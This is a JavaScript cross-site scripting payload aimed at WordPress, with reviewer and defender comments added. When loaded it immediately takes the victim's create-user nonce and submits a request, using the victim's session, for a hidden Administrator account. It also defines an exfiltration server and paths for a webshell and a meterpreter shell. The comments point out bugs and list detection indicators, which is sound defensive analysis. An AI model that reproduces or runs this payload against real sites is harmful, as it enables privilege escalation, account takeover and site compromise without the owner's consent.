// Web server listening for exfil data.
// The data will be sent base64-encoded with a ".js" suffix appended, by
// trying to include a non-existent remote JavaScript file so that the
// base64 data ends up in the server's 404 log.
// Web server that receives the exfiltrated data described in the header
// comment. NOTE(review): nothing in the visible part of this file
// references httpExfilServer, webShellPath or phpMetShellPath; presumably
// other functions of the script, not shown here, consume them. For
// defenders, the host:port below and the two .php paths are indicators
// worth searching for in proxy, web-server and plugin-directory logs.
var httpExfilServer = "http://192.168.78.135:8888";
// These will hold the webshell locations.
// Note that different WordPress servers
// will save these in different locations;
// we don't control the directory name.
// The add-plugin function will parse out
// the correct directory name and update
// these variables as necessary.
var webShellPath = "shell/shell.php";
var phpMetShellPath = "shell/meterpreter.php";
/**
 * Promise-based delay: resolves (with undefined) after `milliseconds`
 * have elapsed, via a single setTimeout.
 *
 * @param {number} milliseconds - delay passed straight to setTimeout
 * @returns {Promise<void>}
 */
const sleep = (milliseconds) => new Promise((resolve) => {
  setTimeout(resolve, milliseconds);
});
/**
 * Pull the payload out of an XMLHttpRequest, choosing the accessor that
 * matches its responseType.
 *
 * @param {XMLHttpRequest} xhr - a request whose response is available
 * @returns {*} responseText when responseType is unset/"" or "text",
 *   responseXML for "document", xhr.responseJSON for "json"
 *   (NOTE(review): responseJSON is not a standard XMLHttpRequest
 *   property — confirm it exists in the target browser), otherwise
 *   xhr.response unchanged.
 */
function read_body(xhr)
{
  // An empty/absent responseType is the same as "text".
  const kind = xhr.responseType || "text";
  switch (kind)
  {
    case "text":
      return xhr.responseText;
    case "document":
      return xhr.responseXML;
    case "json":
      return xhr.responseJSON;
    default:
      return xhr.response;
  }
}
/**
 * Creates a WordPress user through /wp-admin/user-new.php using the
 * session of whoever is logged in to the page this script runs in, and
 * requests the Administrator role for it through the "ure_*" form fields
 * (presumably a role-editor plugin's fields — confirm against the target
 * site). Two requests are made: a GET to harvest the create-user nonce
 * from the form, then a POST with the body assembled below.
 *
 * No parameters, returns nothing; the only observable result is a pair
 * of console.log lines and the alert() at the end.
 *
 * Defender notes:
 *  - The POST carries role=subscriber together with
 *    ure_select_other_roles=administrator / ure_other_roles=administrator.
 *    A createuser request with that combination, arriving with an admin's
 *    cookies but no matching UI activity, is a precise server-side
 *    detection signature (and a reason to require re-authentication or a
 *    fresh nonce check on privileged role changes).
 *  - The literal username, first/last name and password below are
 *    indicators to search the users table for if this script is found
 *    on a site.
 */
function addAdminUser()
{
var uri = "/wp-admin/user-new.php";
// The following user will be added as an Administrator level user
var username = "novouser";
var firstName = "trevor";
var lastName = "roach";
var password = "PasswordStrongEnought";
// NOTE(review): `xhr` is assigned without var/let/const, so it is an
// implicit global; it is reassigned again inside the handler below.
xhr = new XMLHttpRequest();
xhr.open("GET", uri, true);
xhr.send(null);
// The handler is attached after send(); for an async request the
// readystatechange events are delivered later, so DONE is still caught.
xhr.onreadystatechange = function()
{
// Loose == (both sides are numbers, so it behaves like ===).
if (xhr.readyState == XMLHttpRequest.DONE)
{
var response = read_body(xhr);
// The nonce is cut out by fixed offsets: the marker string is 35
// characters long, so the 10 characters following it are taken.
// Nothing checks that noncePos !== -1 or that the response was 200.
var noncePos = response.indexOf('name="_wpnonce_create-user" value="');
var nonceVal = response.substring(noncePos+35, noncePos+45);
// Second request: reuses (and clobbers) the global `xhr`.
xhr = new XMLHttpRequest();
xhr.open("POST", uri);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// Form body built by string concatenation; the values are not
// URL-encoded, so any '&' or '=' in them would break the form.
// (Missing semicolons on the next line and on the _wp_http_referer line.)
var body = "action=createuser&"
body += "_wpnonce_create-user=" + nonceVal + "&";
body += "_wp_http_referer=%2Fwp-admin%2Fuser-new.php&"
body += "user_login=" + username + "&";
// NOTE(review): `email` is not declared anywhere in the visible file.
body += "email=" + email + "&";
body += "first_name=" + firstName + "&";
body += "last_name=" + lastName + "&";
body += "uri=&";
body += "pass1=" + password + "&";
body += "pass1-text=" + password + "&";
body += "pass2=" + password + "&";
body += "pw_weak=on&";
body += "send_user_notification=0&";
// role=subscriber is what the core form expects; the two ure_* fields
// that follow are what request the administrator role.
body += "role=subscriber&";
body += "ure_select_other_roles=administrator&"; // muahahahaha
body += "ure_other_roles=administrator&"; // insert Dr. Evil second muahahahaha
body += "createuser=Add+New+User";
xhr.send(body);
console.log("test inner")
}
console.log("text outer")
}
console.log("LOADED");
// alert() pops a dialog in the victim's browser: a visible artefact of
// this payload that a user report or screenshot may reference.
alert("loaded");
}
// Runs unconditionally as soon as the script is loaded — no user
// interaction is required for the request pair above to be sent.
addAdminUser();